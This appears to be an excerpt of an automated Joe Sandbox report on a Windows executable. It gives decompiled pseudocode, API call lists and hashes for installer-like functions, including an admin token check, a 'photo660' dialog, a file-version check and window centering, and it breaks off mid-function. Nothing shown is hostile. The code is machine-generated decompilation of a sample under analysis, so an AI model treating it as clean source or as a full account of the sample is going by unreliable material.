                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,002118DD), ref: 0021181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0021182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(002118DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,002118DD), ref: 00211855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,002118DD), ref: 00211883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,002118DD), ref: 0021188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: 057baaa059c4499f5c2031993d7d655cd54f6ce42409b1c4b6732cb582e6e8ae
                                                                                                                                                                                                        • Instruction ID: 53fd530ba67533a7bb2534069c487203aba90b1698184f2f9f129b6568125329
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 057baaa059c4499f5c2031993d7d655cd54f6ce42409b1c4b6732cb582e6e8ae
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD119331E11209ABDB109FA4EC4DBFEBBB8EF58700F11416AFA05E2290DF708D518B91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00213450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E002143D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "photo660");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0x219404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0x2191dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00213490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0021349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 002134B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 002134C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 002134CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 002134D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 852535152-1757243477
                                                                                                                                                                                                        • Opcode ID: 7bfc823dace18633e10653779d9fc97097016f2214a0acb9ccfc9edfe472163a
                                                                                                                                                                                                        • Instruction ID: ab50348e1c6c6eade9315367b74756d4b4d0b9ede0d25de0eaac4099d52f8ee2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bfc823dace18633e10653779d9fc97097016f2214a0acb9ccfc9edfe472163a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8901B531261115BBD7279F64EC0C9EE3AD6EB35710F108020F94A865A0CF728FE1DB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00212AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0x219a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00211680(_t65, E002117C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E002165E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E00211680(_t65, E002117C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00212AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00212AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00212B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 00212B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 00212B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00212BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: 8f281d0af32ae74a3b2570494306bf33dc460c27e8eb115d1a2dd3d8a49cb08a
                                                                                                                                                                                                        • Instruction ID: 6001d3559071fd1d5999dbed71bd1e704e1d7bc7e7e3f4c192bb1ef162142f11
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f281d0af32ae74a3b2570494306bf33dc460c27e8eb115d1a2dd3d8a49cb08a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C411334518246AEDB159F209C58BFD7BE99F76314F14409AE8C683202DF754FEA8B50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E002128E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E00212773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t11 =  &_v32; // 0x213938
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									_t16 =  &_v32; // 0x213938
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00212A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00212A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 00212A6F
                                                                                                                                                                                                          • Part of subcall function 00212773: CharUpperA.USER32(58AC7C6D,00000000,00000000,00000000), ref: 002127A8
                                                                                                                                                                                                          • Part of subcall function 00212773: CharNextA.USER32(0000054D), ref: 002127B5
                                                                                                                                                                                                          • Part of subcall function 00212773: CharNextA.USER32(00000000), ref: 002127BC
                                                                                                                                                                                                          • Part of subcall function 00212773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212829
                                                                                                                                                                                                          • Part of subcall function 00212773: RegQueryValueExA.ADVAPI32(?,00211140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212852
                                                                                                                                                                                                          • Part of subcall function 00212773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212870
                                                                                                                                                                                                          • Part of subcall function 00212773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002128A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00213938,?,?,?,?,-00000005), ref: 00212958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00212969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00213938,?,?,?,?,-00000005,?), ref: 00212A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00213938,?,?), ref: 00212A81
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID: 89!
                                                                                                                                                                                                        • API String ID: 3949799724-2547314910
                                                                                                                                                                                                        • Opcode ID: 501ed3b4a4bd1536ec946bf985b7d81448e02980d0e2e8bce2382a3f8f3a8675
                                                                                                                                                                                                        • Instruction ID: 400dad617327de5ec807decb0dc72a94cf598939cdd1a7591674a43699c04119
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 501ed3b4a4bd1536ec946bf985b7d81448e02980d0e2e8bce2382a3f8f3a8675
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8051083191021ADBCB21CF98D884AEEBBF5FF68710F14806AF945E3211DB3199A5DB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E002143D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002143F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0021440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00214423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0021442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0021443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00214447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 002144A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: cc051134e6a7c01f7dd7c66cb4159732c7e235bd536b7fe81671ffd9b0d95bcc
                                                                                                                                                                                                        • Instruction ID: b681c5fdc28963168925fd6237989457fe689078a87f58e3148a05443c0fc8a0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc051134e6a7c01f7dd7c66cb4159732c7e235bd536b7fe81671ffd9b0d95bcc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1315E32E11119AFCB14DFB8ED8C9EEBBB5EB99310F154169F805F3240DA706D458BA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E00216298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
